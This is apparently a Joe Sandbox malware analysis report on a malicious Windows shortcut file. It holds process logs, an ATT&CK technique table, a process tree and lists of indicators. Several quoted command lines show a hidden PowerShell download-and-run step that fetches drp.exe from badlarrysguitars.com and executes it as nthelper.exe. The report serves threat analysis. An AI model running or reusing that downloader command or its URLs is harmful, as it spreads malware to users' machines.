Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3058
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5793
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4268
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5884
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3823
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 5085
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ctfmoon.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7056 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4576 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: svchost.exe, 0000000A.00000002.2570806923.00000203ED42B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: powershell.exe, 00000003.00000002.1547715754.00000207E4BA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: powershell.exe, 00000006.00000002.1647699924.000001D7FCAB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2573554079.00000203F2A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1547715754.00000207E4BA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\-O
Source: powershell.exe, 00000012.00000002.2736600743.000001DAFC764000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: )=Vmci
Source: powershell.exe, 00000012.00000002.2734761731.000001DAFC6F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000003.00000002.1547715754.00000207E4B40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV0T
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\nthelper.exe "C:\Users\user\AppData\Local\Temp\nthelper.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "start-process powershell -argumentlist 'invoke-webrequest -uri "https://badlarrysguitars.com/share/drp.exe" -outfile (join-path ([system.io.path]::gettemppath()) "nthelper.exe"); start-process -filepath (join-path ([system.io.path]::gettemppath()) "nthelper.exe")' -windowstyle hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" invoke-webrequest -uri https://badlarrysguitars.com/share/drp.exe -outfile (join-path ([system.io.path]::gettemppath()) nthelper.exe); start-process -filepath (join-path ([system.io.path]::gettemppath()) nthelper.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 21 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Behavior Graph (ID: 1570131, Sample: IFhqcKaIol.lnk, Startdate: 06/12/2024, Architecture: WINDOWS, Score: 80)

DNS/IP: badlarrysguitars.com; x1.i.lencr.org; bg.microsoft.map.fastly.net
Signatures: Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; Suspicious powershell command line found; 3 other signatures

Process tree:

  • powershell.exe (started); signatures: Windows shortcut file (LNK) starts blacklisted processes, Suspicious powershell command line found, Powershell drops PE file
    • powershell.exe (started); DNS/IP: badlarrysguitars.com 101.99.75.174, 443, 49706, 49717, SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY, Malaysia; dropped: C:\Users\user\AppData\Local\...\nthelper.exe, PE32+
      • nthelper.exe (started); signatures: Windows shortcut file (LNK) starts blacklisted processes, Suspicious powershell command line found, Machine Learning detection for dropped file
        • powershell.exe (started); dropped: C:\Users\user\AppData\Local\...\ctfmoon.exe, PE32+
          • conhost.exe (started)
        • powershell.exe (started)
          • Acrobat.exe (started)
            • AcroCEF.exe (started)
              • AcroCEF.exe (started); DNS/IP: 3.219.243.226, 443, 49761, 49767, AMAZON-AESUS, United States
          • conhost.exe (started)
      • conhost.exe (started)
    • conhost.exe (started)
  • svchost.exe (started); DNS/IP: 127.0.0.1 unknown unknown

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| IFhqcKaIol.lnk | 21% | ReversingLabs | Script-BAT.Downloader.Heuristic | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nthelper.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\nthelper.exe | 8% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path( | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com/share/alert.pdf | 0% | Avira URL Cloud | safe | |
| http://www.microsoft.co | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path( | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com/share/drp.exe-OutFile(Join-Path( | 0% | Avira URL Cloud | safe | |
| http://badlarrysguitars.com | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com/private/nois.exe | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com/share/drp.exeel | 0% | Avira URL Cloud | safe | |
| https://badlarrysguitars.com/share/drp.exe | 0% | Avira URL Cloud | safe | |
| https://oneget.org | 0% | Avira URL Cloud | safe | |
| https://oneget.orgX | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high |
| badlarrysguitars.com | 101.99.75.174 | true | true | | unknown |
| x1.i.lencr.org | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://badlarrysguitars.com/share/alert.pdf | true | Avira URL Cloud: safe | unknown |
| https://badlarrysguitars.com/private/nois.exe | true | Avira URL Cloud: safe | unknown |
| https://badlarrysguitars.com/share/drp.exe | true | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | high |
| https://go.micro | powershell.exe | false | | high |
| http://www.microsoft.co | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://contoso.com/License | powershell.exe | false | | high |
| https://contoso.com/Icon | powershell.exe | false | | high |
| http://crl.ver) | svchost.exe | false | | high |
| https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe | false | | high |
| https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path( | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path( | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://badlarrysguitars.com/share/drp.exe-OutFile(Join-Path( | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://github.com/Pester/Pester | powershell.exe | false | | high |
| https://g.live.com/odclientsettings/Prod.C: | svchost.exe | false | | high |
| https://badlarrysguitars.com | powershell.exe | true | Avira URL Cloud: safe | unknown |
| http://badlarrysguitars.com | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://badlarrysguitars.com/share/drp.exeel | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://contoso.com/ | powershell.exe | false | | high |
| https://nuget.org/nuget.exe | powershell.exe | false | | high |
| https://oneget.orgX | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://aka.ms/pscore68 | powershell.exe | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | | high |
| https://oneget.org | powershell.exe | false | Avira URL Cloud: safe | unknown |

IP | Domain | Country | ASN | ASN Name | Malicious
3.219.243.226 | unknown | United States | 14618 | AMAZON-AESUS | false
101.99.75.174 | badlarrysguitars.com | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | true

IP
127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1570131
                                      Start date and time:2024-12-06 15:41:00 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 11s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:23
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:IFhqcKaIol.lnk
                                      renamed because original name is a hash value
                                      Original Sample Name:7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9.lnk
                                      Detection:MAL
                                      Classification:mal80.winLNK@29/56@2/3
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 6
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .lnk
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 23.218.208.137, 199.232.214.172, 23.218.208.109, 23.195.39.65, 23.32.238.19, 23.32.238.48, 23.32.238.81, 2.19.198.202, 2.19.198.201, 23.32.238.74, 2.19.198.209, 23.32.238.83, 23.32.238.49, 2.20.40.170, 23.193.114.34, 23.193.114.8, 23.32.238.75, 23.32.238.80, 23.32.238.27, 23.32.239.56, 23.32.239.65, 23.32.239.9, 2.19.198.27
                                      • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                      • Execution Graph export aborted for target nthelper.exe, PID 7808 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 3400 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing network information.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: IFhqcKaIol.lnk
Time | Type | Description
09:41:58 | API Interceptor | 113x Sleep call for process: powershell.exe modified
